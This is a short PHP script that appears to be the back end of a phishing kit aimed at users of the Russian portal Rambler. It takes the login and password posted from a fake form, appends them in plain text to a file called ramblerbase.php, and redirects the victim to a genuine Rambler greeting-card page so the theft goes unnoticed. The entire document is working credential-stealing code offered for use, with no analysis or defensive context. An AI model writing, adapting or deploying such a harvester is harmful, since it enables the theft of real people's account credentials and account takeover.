<?php
	$Login = $_POST['login'];
	$Passw = $_POST['passw'];

	$fp = fopen("ramblerbase.php","a+");
	fwrite($fp,"$Login:$Passw\n");
	fclose($fp);

	header("Location: http://cards.rambler.ru/sendcard.html?id=-5623");
	echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=\"http://cards.rambler.ru/sendcard.html?id=-5623\">";
?>